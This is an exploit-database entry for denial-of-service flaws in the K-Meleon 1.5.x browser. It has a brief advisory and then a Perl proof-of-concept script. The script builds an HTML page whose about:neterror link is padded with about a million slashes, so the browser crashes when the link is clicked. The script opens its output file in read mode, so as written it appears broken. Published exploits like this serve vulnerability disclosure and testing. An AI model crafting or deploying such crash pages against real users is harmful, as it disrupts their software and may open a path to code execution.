K-Meleon 1.x – URI Handling Multiple Denial of Service Vulnerabilities

  • 作者: Lostmon
    日期: 2010-08-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34404/
  • source: https://www.securityfocus.com/bid/42200/info
    
    K-Meleon is prone to multiple denial-of-service vulnerabilities because it fails to properly sanitize user-supplied input.
    
    An attacker can exploit these issues to crash the application. Given the nature of these vulnerabilities, the attacker may also be able to execute arbitrary code; this has not been confirmed.
    
    #######################################################################
    #!/usr/bin/perl
    # k-meleon Long "a href" Link DoS
    # Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
    # k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
    # generate the file open it with k-keleon click in the link and wait a seconds
    ######################################################################
    
    $archivo = $ARGV[0];
    if(!defined($archivo))
    {
    
    print "Usage: $0 <archivo.html>\n";
    
    }
    
    $cabecera = "<html>" . "\n";
    $payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
    1028135 . "\">click here if you can :)</a>" . "\n";
    $fin = "</html>";
    
    $datos = $cabecera . $payload . $fin;
    
    open(FILE, '<' . $archivo);
    print FILE $datos;
    close(FILE);